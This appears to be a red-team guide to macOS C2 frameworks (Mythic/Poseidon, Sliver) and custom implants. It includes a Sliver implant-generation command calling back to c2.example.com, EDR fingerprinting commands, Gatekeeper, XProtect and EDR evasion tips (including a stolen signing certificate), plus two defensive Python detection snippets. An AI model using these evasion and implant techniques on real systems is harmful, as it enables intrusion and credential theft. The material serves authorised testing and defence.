macOS Red Team Tools: Mythic, Sliver, Poseidon and custom implants for offensive operations

Depov

macOS kill chain: where C2 stands
A corporate Mac is a Keychain full of OAuth tokens, VPN configurations, active Slack and Teams sessions, and SSH keys without a passphrase. According to the CrowdStrike Global Threat Report 2025, 79% of attacks are carried out without malware (living off the land), and 75% of intrusions use valid accounts. One compromised Mac with an active SSO session gives lateral movement without a single exploit.

A C2 framework solves three specific problems: a stable control channel that gets past the EDR, post-exploitation of macOS-specific storage (Keychain, the TCC database), and a foothold for moving into the corporate network.

The full chain mapped to MITRE ATT&CK:
1. Initial access - spear-phishing with a .dmg/.pkg, supply chain, watering hole
2. Defense Evasion - Gatekeeper bypass (T1553.001, Gatekeeper Bypass). The Atomic Red Team tests for T1553.001 are implemented for macOS (executor: sh). Evasion precedes execution; do not mix the two
3. Execution - launching the payload. Malicious File (T1204.002) is described by MITRE as a cross-platform technique, but the Atomic Red Team tests for it are implemented only for Windows. There are no ready-made atomic tests for macOS; validation requires custom scenarios
4. C2 callback - the implant establishes a connection to the C2 server
5. Persistence - LaunchAgent/LaunchDaemon, Dylib Hijacking (T1574.004; tactics Persistence, Privilege Escalation and Defense Evasion)
6. Post-exploitation - Keychain dump, credential harvesting, lateral movement
C2 is the bridge between a one-time foothold and a full-fledged operation. Without a stable channel you lose access at the first reboot.
Fingerprinting before choosing a C2
[Applies to: internal and external pentests, macOS Ventura 13.x to Sequoia 15.x]

Before deploying C2 on a macOS target you need to answer four questions. The choice of framework and its configuration depend on them:
1. macOS version and architecture. sw_vers and uname -m give the OS version and processor type (arm64 vs x86_64). On Apple Silicon, AMFI blocks unsigned code even with Gatekeeper and SIP turned off; for delivery this is critical
2. Which EDR is installed. Via ps aux | grep -i -E "falcon|sentinelone|kaspersky" or by reviewing the LaunchDaemons in /Library/LaunchDaemons/. The specific vendor determines the permissible transport and traffic profile
3. MDM provider. Jamf (jamf checkJSSConnection), Kandji, or another. MDM monitors changes to LaunchAgents via the Endpoint Security API, so persistence is immediately in question
4. Network restrictions. Proxy, Little Snitch / LuLu (user-mode firewalls), corporate DNS: all of this determines which transport (HTTPS, DNS, mTLS) will get through. Little Snitch blocks outgoing connections of unknown processes and shows the user an alert; staging over DNS in such conditions is useless, the connection will die before the channel is established
Mythic C2 on macOS: architecture and the Poseidon agent
[Applies to: internal and external pentests, macOS Ventura 13.x to Sequoia 15.x]

Mythic is a multi-platform C2 framework from SpecterOps with an agent-agnostic architecture. The key point: the server is not tied to a particular agent. Connect an agent as a Docker container and you get a single web interface, transaction logging and multi-operator mode. Several pentesters work with the same agents at the same time, seeing each other's actions in real time.

Environment requirements for the Mythic server: Linux (Ubuntu 20.04+), at least 4 GB RAM (recommended for several operators working in parallel), Docker and Docker Compose. Go 1.21+ is pulled in automatically when the Poseidon payload is compiled. Network: HTTP/HTTPS on the server, optionally DNS for a fallback channel.

Poseidon is the main macOS agent for Mythic, written in Go. According to SentinelOne, Poseidon is a Golang agent that "beacons back to an operator" and provides a set of post-exploitation capabilities: Keychain access, screenshots, clipboard, file transfer, shell execution, process handling.

The payload is created through the Mythic web interface: select the Poseidon agent, specify the callback host/port, transport (HTTP/HTTPS/websocket), callback interval and jitter. The server compiles the Go binary and hands back the finished file.

Other macOS agents in Mythic:
• Apfell - JXA agent in MythicAgents/apfell. Apfell was the original name of the Mythic framework itself (renamed around 2020); the JXA agent kept the name, but active development has shifted to Poseidon
• Apollo - Mythic .NET agent, built for Windows (MythicAgents/Apollo). The JSS URL substitution technique in /Library/Preferences/com.jamfsoftware.jamf.plist to intercept the C2 channel via MDM is described in the community, but at the time of writing no dedicated Mythic agent for JAMF abuse was found in the public MythicAgents repository
• Orthrus is mentioned in the context of delivery via .mobileconfig MDM profiles, but the public MythicAgents/Orthrus repository was not available at the time of writing; the agent's existence and status are unconfirmed
Not to be confused: Poseidon (the Mythic agent) and Poseidon Stealer are completely different tools that share a name. According to Red Canary, Poseidon Stealer was active in 2024 and early 2025, then was sold and rebranded as Odyssey Stealer. It is criminal macOS stealer malware and has nothing to do with the Mythic agent.

When Mythic does not work:
• Little Snitch / LuLu - user-mode firewalls block the Poseidon agent's outgoing connections and require manual approval from the victim. Staging fails without social engineering
• CrowdStrike Falcon for Mac - monitors child processes of osascript and shell commands; direct execution through do shell script is caught by the behavioral engine
• AMFI on Apple Silicon - a payload without a code signature is blocked when loaded into memory, even if Gatekeeper and SIP are disabled. In the kernel log: "AMFI: code signature validation failed"
• Deployment overhead - the Docker infrastructure is excessive for a quick one-shot pentest. If you need a fast result, Sliver is simpler
Sliver on macOS: monolithic C2 with native cross-compilation
[Applies to: internal and external pentests, macOS Ventura 13.x to Sequoia 15.x]

Sliver from Bishop Fox is a C2 framework that compiles the implant as a native Go binary. Unlike the modular Mythic, Sliver is monolithic: server, implant generation and control are one binary. The operator interface is a CLI over gRPC (no web UI).

Environment requirements: Linux or macOS for the server, at least 2 GB RAM; the Go toolchain is pulled in automatically. Cross-compilation for macOS arm64/x86_64 is built in, so a separate macOS host is not needed.

Architectural differences from Mythic:
• Transports: mTLS, HTTPS, DNS, WireGuard - a wider set of channels
• Built-in support for arm64 and x86_64 without additional configuration
• Extension through BOFs (Beacon Object Files) and extensions
• Multi-operator mode via gRPC
Bash:
generate --os darwin --arch arm64 \
--http https://c2.example.com \
--name macos-implant \
--skip-symbols \
--save /tmp/

Stageless vs staged: for macOS, definitely stageless. A staged implant makes two network requests: the first for the stager, the second for the main payload. On machines with Little Snitch or a corporate proxy this doubles the chance of detection. A stageless binary is heavier (8-15 MB), but it takes one callback and you are in.

When Sliver does not work:
• SentinelOne for macOS detects standard Sliver implants by behavioral patterns at staging. DNS transport burns especially fast: the characteristic subdomain length and request frequency
• Binary size - 8-15 MB is suspicious for a "utility" delivered through phishing
• Default HTTP profiles - easily signatured by XProtect and EDR. Malleable profiles are required
• macOS-specific commands are limited compared to Poseidon: no built-in Keychain access, no clipboard monitoring; everything goes through the shell or BOFs
Decision tree:
• Target is a pure macOS fleet, the operation runs for weeks, Keychain is needed → Mythic + Poseidon
• Mixed fleet (macOS + Windows + Linux), a DNS channel is needed → Sliver
• Mature SOC with CrowdStrike/SentinelOne, any public C2 burns → custom implant
Custom macOS implants: when frameworks are not enough
[Applies to: red team operations against a mature SOC with macOS EDR]

Public frameworks against infrastructure with a current EDR are a foregone conclusion. CrowdStrike and SentinelOne continuously update their detections for Sliver and Poseidon. A custom implant is the only working option.
Go vs Swift: language selection
Go is the standard for cross-platform implants. Poseidon is written in Go, and the set of libraries for C2 communications (HTTP clients, crypto, DNS) is mature. Problem: Go binaries are heavy (5+ MB) and have a recognizable section structure.

Swift is native to macOS, the binaries are much smaller, and calls to the macOS API look legitimate without a cgo layer. Problem: no cross-platform support, and a harder CI/CD setup.

Objective-C - for working with the legacy Cocoa API and Kerberos. Bifrost (a tool for macOS Kerberos attacks) is written in Objective-C to interact with the Heimdal krb5 API.

For pure macOS operations Swift gives a smaller footprint and better mimicry. For multi-platform work, Go with aggressive obfuscation. In most of the mixed projects from my practice the custom implant was in Go, because the fleet was mixed and one binary was built for darwin/arm64, darwin/amd64 and linux/amd64.
Code signing and Gatekeeper bypass
Gatekeeper bypass (T1553.001, Defense Evasion tactic) is a mandatory stage, separate from execution. Three options:
1. Ad-hoc signing via codesign --force --deep --sign - is the minimum. Sequoia 15.x requires manual approval in System Settings → Privacy & Security
2. Developer ID (bought or stolen) - the binary passes Gatekeeper and notarization as long as Apple has not revoked the certificate
3. Delivery without quarantine - files fetched with curl, wget or from an SMB share (Finder → Cmd+K) do not receive the com.apple.quarantine attribute and bypass Gatekeeper completely
According to Red Canary, in October 2024 Apple closed the vulnerability that allowed Gatekeeper to be bypassed via right-click → "Open". Malware (including Atomic Stealer) had previously instructed victims to do exactly that. After the patch, distribution shifted to ClickFix / paste-and-run methods: social engineering instead of a technical vulnerability.

AMFI on Apple Silicon checks the signature when the binary is loaded into memory, regardless of Gatekeeper and SIP. On Apple Silicon ad-hoc signing is the minimum requirement; completely unsigned code will not start.
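For responders triaging the quarantine mechanism described above, an added example (not code from the original post) that decodes a file's com.apple.quarantine attribute or reports that it is missing, which is what distinguishes a Gatekeeper-evaluated download from a curl/wget/SMB drop. The flags;hex-timestamp;agent;uuid layout is assumed from values seen in practice, and the attribute reader is injectable so the parsing logic also runs off macOS.

```python
import subprocess
from datetime import datetime, timezone

QUARANTINE_XATTR = "com.apple.quarantine"


def parse_quarantine(value):
    """Decode a quarantine value. Assumed layout (from values seen in practice):
    '<flags hex>;<download time, hex epoch seconds>;<agent name>;<event uuid>'."""
    parts = value.strip().split(";")
    if len(parts) < 3:
        raise ValueError(f"unexpected quarantine value: {value!r}")
    return {
        "flags": int(parts[0], 16),
        "downloaded_at": datetime.fromtimestamp(int(parts[1], 16), tz=timezone.utc),
        "agent": parts[2],  # application that wrote the attribute (Safari, Chrome, ...)
        "uuid": parts[3] if len(parts) > 3 else "",  # links to the LaunchServices quarantine events DB
    }


def read_quarantine_xattr(path):
    """Read the attribute with the macOS xattr(1) CLI; None when the file has none."""
    proc = subprocess.run(["xattr", "-p", QUARANTINE_XATTR, path],
                          capture_output=True, text=True)
    return proc.stdout.strip() if proc.returncode == 0 else None


def triage(path, read_xattr=read_quarantine_xattr):
    """Classify one file. read_xattr is injectable so the logic can be exercised off macOS."""
    raw = read_xattr(path)
    if raw is None:
        # No attribute: the file arrived via a non-quarantine-aware path
        # (curl, wget, SMB, ...) and Gatekeeper never evaluated it.
        return {"path": path, "quarantined": False,
                "note": "no com.apple.quarantine; Gatekeeper never evaluated this file"}
    info = parse_quarantine(raw)
    info.update(path=path, quarantined=True)
    return info


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(triage(p))
```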
XProtect evasion
XProtect is Apple's antivirus engine with YARA-rule signatures, updated automatically. Standard Sliver/Mythic payloads are in its database. According to SentinelOne, at least 7 obfuscation techniques are seen among macOS payloads. In practice two are enough to get past XProtect: string encryption (the characteristic user-agent and URL patterns) and rebuilding from source with a refactored binary structure, i.e. renamed functions and a changed initialization order.
OPSEC and evasion by macOS EDR vendor
CrowdStrike Falcon for Mac
• Monitoring of child processes of curl, wget and osascript; the pattern "curl downloads a binary → the binary starts" triggers an alert
• Sliver DNS channels are detected by subdomain length and request frequency
• Bypass: custom HTTP profile with 30-50% jitter, mimicry of legitimate SaaS traffic (Slack API, Teams webhooks), do not use osascript as the launcher
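Detection logic for the two DNS-channel signals that both the Sliver section and the Falcon notes name, subdomain label length and query cadence, as an added example written from the defender's side and not part of the original post. It runs over a constructed resolver log; the log line format, the two-label registrable-domain shortcut and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed resolver log, one query per line: "<ISO time> <client> <qname> <qtype>".
# 10.0.0.5 is ordinary Apple update traffic; 10.0.0.7 emits beacon-style queries
# with 40-character encoded labels at a steady 2-second cadence.
BENIGN = [f"2025-03-01T10:0{i}:00 10.0.0.5 {h}.apple.com A"
          for i, h in enumerate(["www", "gsp", "swscan", "configuration", "xp", "www"])]
BEACON = [f"2025-03-01T10:00:{2 * i:02d} 10.0.0.7 {i:02d}{'a1b2c3d4e5f6' * 3}xy.updates-cdn.example.net TXT"
          for i in range(8)]
SAMPLE_LOG = "\n".join(BENIGN + BEACON)

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def registrable_domain(qname):
    # Assumption: the last two labels are the registrable domain (no public suffix list lookup).
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze(log_text, min_queries=5, max_label_len=30, max_rate_per_min=3.0):
    """Return [(client, domain, reason)] for client/domain pairs that look like DNS C2."""
    groups = defaultdict(list)  # (client, domain) -> [(time, qname), ...]
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # skip lines that do not match the assumed format
        ts, client, qname, _qtype = m.groups()
        groups[(client, registrable_domain(qname))].append((datetime.fromisoformat(ts), qname))
    findings = []
    for (client, domain), events in groups.items():
        if len(events) < min_queries:
            continue  # too few queries to judge cadence
        events.sort()
        labels = [lab for _, q in events for lab in q.split(".")[:-2]]  # subdomain part only
        longest = max(map(len, labels), default=0)
        span_min = max((events[-1][0] - events[0][0]).total_seconds() / 60, 1 / 60)
        rate = len(events) / span_min
        reasons = []
        if longest > max_label_len:
            reasons.append(f"label length {longest}")
        if rate > max_rate_per_min:
            reasons.append(f"{rate:.0f} queries/min")
        if reasons:
            findings.append((client, domain, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for client, domain, reason in analyze(SAMPLE_LOG):
        print(f"{client} -> {domain}: {reason}")
```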
SentinelOne for macOS
• Behavioral analysis at staging: a two-phase load (stager → payload) = alert
• Detects standard Sliver mTLS handshakes by their characteristic TLS parameters
• Bypass: stageless implant, HTTPS with a custom SNI, delivery through a legitimate proxy endpoint
Kaspersky Endpoint Security for Mac
• Less aggressive in behavioral analysis; the priority is the signature base
• Bypass: a rebuilt implant with a changed binary structure is usually sufficient; behavioral detection is weaker
Sigma-rules and D3FEND